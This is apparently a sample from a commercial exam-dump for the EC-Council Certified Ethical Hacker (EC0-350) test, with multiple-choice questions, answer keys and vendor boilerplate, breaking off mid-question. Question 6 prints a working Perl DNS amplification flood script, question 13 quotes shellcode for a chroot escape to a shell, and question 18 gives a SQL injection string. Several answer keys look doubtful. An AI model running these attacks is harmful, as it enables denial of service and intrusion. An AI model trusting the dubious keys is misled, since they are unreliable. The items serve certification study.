Você está na página 1de 11

Exam Title

: :

EC-Council EC0-350 Ethical Hacking and Countermeasures

Version :

R6.1

www.Prepking.com

Prepking - King of Computer Certification Important Information, Please Read Carefully


Other Prepking products A) Offline Testing engine Use the offline Testing engine product to practice the questions in an exam environment. B) Study Guide (not available for all exams) Build a foundation of knowledge which will be useful also after passing the exam. Latest Version We are constantly reviewing our products. New material is added and old material is updated. Free updates are available for 90 days after the purchase. You should check your member zone at Prepking and update 3-4 days before the scheduled exam date. Here is the procedure to get the latest version: 1.Go towww.Prepking.com 2.Click on Member zone/Log in (right side) 3. Then click My Account 4.The latest versions of all purchased products are downloadable from here. Just click the links. For most updates,it is enough just to print the new questions at the end of the new version, not the whole document. Feedback If you spot a possible improvement then please let us know. We always interested in improving product quality. Feedback should be send to feedback@Prepking.com. You should include the following: Exam number, version, page number, question number, and your login ID. Our experts will answer your mail promptly. Copyright Each PDF file contains a unique serial number associated with your particular name and contact information for security purposes. So if we find out that a particular PDF file is being distributed by you, Prepking reserves the right to take legal action against you according to the International Copyright Laws. Explanations This product does not include explanations at the moment. If you are interested in providing explanations for this exam, please contact feedback@Prepking.com.

www.Prepking.com

1. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges? A. LocalSystem B. Administrator C. IUSR_COMPUTERNAME D. IIS default installation account Answer: A 2. What is the most common vehicle for social engineering attacks? A. Email B. Direct in person C. Local Area Networks D. Peer to Peer networks Answer: B 3. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker? A. 5 minutes B. 23 days C. 200 years D. 16 million years Answer: A 4. What hacking attack is challenge/response authentication used to prevent? A. Replay attacks B. Scanning attacks C. Session hijacking attacks D. Password cracking attacks Answer: A 5. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup
www.Prepking.com

of a target network. How would you search for these posting using Google search? A. Search in Google using the key search strings "the target company" and "newsgroups" B. Search for the target company name at http://groups.google.com C. Use NNTP websites to search for these postings D. Search in Google using the key search strings "the target company" and "forums" Answer: B 6. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS server will reply to that network address. It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request. The following perl code can launch these attacks. use Net::DNS::Resolver; use Net::RawIP; open(LIST,"ns.list"); @list=<LIST>; close LIST; chomp(@list); my $lnum=@list; my $i=0; my $loop=0; if ($ARGV[0] eq '') { print "Usage: ./hackme.pl <target IP> <loop count>\n"; exit(0); } while($loop < $ARGV[1]) { while($i < $lnum) {
www.Prepking.com

my $source = $ARGV[0]; my $dnspkt = new Net::DNS::Packet("google.com","ANY"); my $pktdata = $dnspkt->data; my $sock = new Net::RawIP({udp=>{}}); $sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} }); $sock->send; $i++; }$loop++; $i=0;} exit(0); What type of attacks are these? A. DNS reflector and amplification attack B. DNS cache poisoning attacks C. DNS reverse connection attacks D. DNS forward lookup attacks Answer: A 7. The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony. The law states: Section 1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-garden hacking. Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed. Section 3 offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For a conviction to succeed there must have been the intent to cause
www.Prepking.com

the modification, and knowledge that the modification had not been authorized. What is this law called? A. Computer Misuse Act 1990 B. Computer Incident Act 2000 C. Cyber Crime Law Act 2003 D. Cyber Space Crime Act 1995 Answer: A 8. Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its "security defenses has been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 90,000 addresses containing customer credit cards and passwords. Spears Technology found this attack to be so severe that they reported the attack to the FBI for a full investigation. Spears Technology was looking to law enforcement officials to protect their intellectual property. How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technologys corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge. The hackers were traced back to Beijing, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technologys network from a remote location, posing as employees. The intent of the attack was to steal the source code for their VOIP system and "hold it hostage" from Spears Technology, in exchange for ransom. The hackers had intended on selling the stolen VOIP software source code to competitors. How would you prevent such attacks from occurring in the future at Spears Technology? A. Disable VPN access to all your employees from home machines B. Allow VPN access but replace the standard authentication with biometric authentication C. Replace the VPN access with dial-up modem access to the companys network D. Enable 25 character complex password policy for employees to access the VPN network Answer: A 9. Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous
www.Prepking.com

e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of the potential for financial loss. Bob has asked his companys firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.Why will this not be possible? A. Firewalls cannot inspect traffic coming through port 443 B. Firewalls can only inspect outbound traffic C. Firewalls cannot inspect traffic coming through port 80 D. Firewalls cannot inspect traffic at all, they can only block or allow certain ports Answer: D 10. Travis works primarily from home as a medical transcriptionist. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. He uses voice recognition software to help him transfer what he dictates to electronic documents. The voice recognition software is processor intensive, which is why he bought the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-date with Microsoft patches.After another month of working on the computer, Travis?computer is even more noticeably slow. Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it, and he depends on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder by folder, to see if there is anything he can find. He spends over four hours pouring over the files and folders and cannot find anything. But, before he gives up, he notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Travis thinks this is very odd. ? Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travis?problems? A. Traviss computer is infected with stealth kernel level rootkit B. Traviss computer is infected with Stealth Trojan Virus C. Traviss computer is infected with Self-Replication Worm that fills the hard disk space
www.Prepking.com

D. Logic Bomb is triggered at random times creating hidden data consuming junk files Answer: A 11. What does this symbol mean?

A. Open access point B. WPA encrypted access point C. WEP encrypted access point D. Closed access point Answer: A 12. You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?

A. The IP range used by the target network B. How strong the corporate security policy is C. The types of operating systems and applications being used D. An understanding of the number of employees in the company Answer: C 13. while investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspects workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following: #define ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24) char infin_loop[]= /* for testing purposes */ "\xEB\xFE";
www.Prepking.com

MAKE_STR_FROM_RET(x)

char bsdcode[] = /* Lam3rZ chroot() code by venglin */ "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43" "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0" "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0" "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80" "\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9" "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75" "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd" "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46" "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56" "\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53" "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30" "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e" "\x67\x6c\x69\x6e"; static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; static char *magic_str=NULL; int before_len=0; What can he infer from this file? A. An encrypted file B. A uuencoded file C. A buffer overflow D. A picture that has been renamed with a .txt extension Answer: C 14. Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test? A. Only the IP address range B. Nothing but corporate name C. All that is available from the client D. IP Range, OS, and patches installed Answer: B
www.Prepking.com

15. Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the compromised account to one having increased privileges, such as that of an administrator. What would be the best countermeasure to protect against such escalation? A. Give users tokens B. Give users two passwords C. Give users a strong policy document D. Give user the least amount of privileges Answer: D 16. Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. How would you call this type of activity? A. Scanning B. CI Gathering C. Dumpster Diving D. Garbage Scooping Answer: C 17. Jess the hacker runs L0phtCrack's built-in sniffer utility that grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. Why? A. The physical network wire is on fibre optic cable B. The network protocol is configured to use IPSEC C. The network protocol is configured to use SMB Signing D. L0phtCrack SMB sniffing only works through Switches and not Hubs Answer: C 18. You are conducting pen-test against a companys website using SQL Injection techniques. You enter "anything' or 1=1 ? in the username field of an authentication form. This is the output returned from the server.

www.Prepking.com

100% Pass Guaranteed or Full Refund Word to Word Real Exam Questions from Real Test Buy full version of exam from this link below http://www.prepking.com/EC0-350V4.htm